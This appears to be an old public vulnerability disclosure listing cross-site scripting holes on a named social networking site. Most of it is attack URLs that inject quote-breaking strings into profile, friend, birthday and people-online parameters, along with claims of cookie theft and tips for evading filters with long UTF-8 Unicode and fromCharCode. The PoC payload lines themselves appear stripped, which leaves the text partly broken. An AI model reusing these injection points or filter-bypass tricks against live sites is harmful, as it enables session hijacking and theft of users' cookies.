Bingbox.com Homepage: http://www.bingbox.com Affected files: * Profile input boxes: - City input * Registering * Viewing Birthdays * Adding a friend * Viewing people online ----------------------------------------------- XSS with cookie disclosure via inviting friends: http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=start">">">">">'>'>'><"< "<"<'<'<' XSS vuln with cookie disclosure via "City" input box on profile: Data isnt properly sanatized before being generated. In one part of the site its output as full code on the screen (tested using tags, with tags, no code displays), and on the other part, an XSS can occur: For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode for ':
For the cookie:
-------------------------------------------------- XSS with cookie disclosure when viewing a blog, that redirects you to the register page: http://bingbox.com/go/register/wanted=luny666/">">">">">">'>'><"<"<'<'<"<" ----------------------------------------------- XSS via viewing birthdays: http://www.bingbox.com/go/birthdays/month=8&day=13">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<"">< "<" ------------------------------------------------- XSS when adding a new friend. Same as above, we arent able to use ' or long UTF-8 unicode above, so we use fromCharCode's. PoC: http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><"<" -------------------------------------------------- XSS vuln when viewing people online: http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3 ------------------------------------------------ More XSS vulns: http://www.bingbox.com/go/static/file=av">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<"">< http://www.bingbox.com/go/static/file=ps">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<"">< http://www.bingbox.com/go/static/file=gedragscode">'>'>'>"><"">">">"><"<"<"<"<'<'<'<"<"">< Screenshots: http://www.youfucktard.com/xsp/bingbox1.jpg http://www.youfucktard.com/xsp/bingbox2.jpg http://www.youfucktard.com/xsp/bingbox3.jpg http://www.youfucktard.com/xsp/bingbox4.jpg http://www.youfucktard.com/xsp/bingbox5.jpg http://www.youfucktard.com/xsp/bingbox6.jpg http://www.youfucktard.com/xsp/bingbox7.jpg http://www.youfucktard.com/xsp/bingbox8.jpg